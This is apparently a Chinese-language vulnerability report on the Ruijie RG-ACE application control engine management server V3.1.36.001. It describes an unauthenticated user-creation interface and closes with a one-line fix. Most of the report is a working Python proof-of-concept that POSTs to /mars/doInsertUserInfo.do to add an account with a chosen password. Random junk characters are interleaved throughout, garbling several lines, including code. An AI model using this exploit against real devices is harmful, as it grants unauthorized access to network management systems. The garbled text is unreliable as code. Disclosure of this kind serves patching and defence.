锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

% w% V$ |. c: W# p) e
测试的具体版本是
. P, A0 B& z8 a! I* @产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730
  O: @9 G% z; a, l
+ M" w% m1 ?  O7 a
漏洞证明：

2 ^4 W+ V: t% r2 |

' p; x0 }' ~2 k5 w' ]! U: V
* l2 C8 @7 j' U! k3 \5 s$ m; v

/ f  ~, g- ~& k0 P执行脚本
! ~+ C5 ?, e" A+ C6 P( K4 n#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
2 j+ C  R9 z% }* ?0 Ourl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
4 |$ v& R! K% k4 r5 y1 \, lopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
( L( S" l8 N# j. \- O0 `post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
) C3 ^1 }, d% U4 v("pwd","aaaaaa"),######密码自己加
2 {) ]! |; Z0 U& S4 c; U. C("trueName","ad"),
("email",""),
("mobilePhone",""),
9 H3 S5 I1 @- m$ x+ v/ s) Q+ `("officePhone",""),
3 \: @2 k2 f: `* [) y( {  }) e("addr",""),
("submit","确定"))
* a# i5 N- m6 Z* M  E/ s8 [urllib2.install_opener(opener)
( b/ D  t$ o" c4 G3 l/ I# Mp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

9 Z, `6 T$ T* z1 h+ }" J4 \# O登录，连接设备
1 q* O/ ~4 Q7 a2 z" H/ x' w* |

% w# X+ ]5 o, E3 v2 V  L  |
2 W7 _, R5 y, X# q$ h1 t( `

默认的管理员admin权限更大点
$ b0 \0 Q( y7 g2 M6 h2 O3 ~
! G2 {* P9 w2 g& @$ o2 V; `

. `% T$ J+ z& {5 f

/ }5 w4 {# B* ^6 }8 [. T7 o修复方案：
加强对接口的权限验证
. @1 n* y0 N1 x# m& `2 A  m
9 V6 i( G' r/ Y, W2 d. w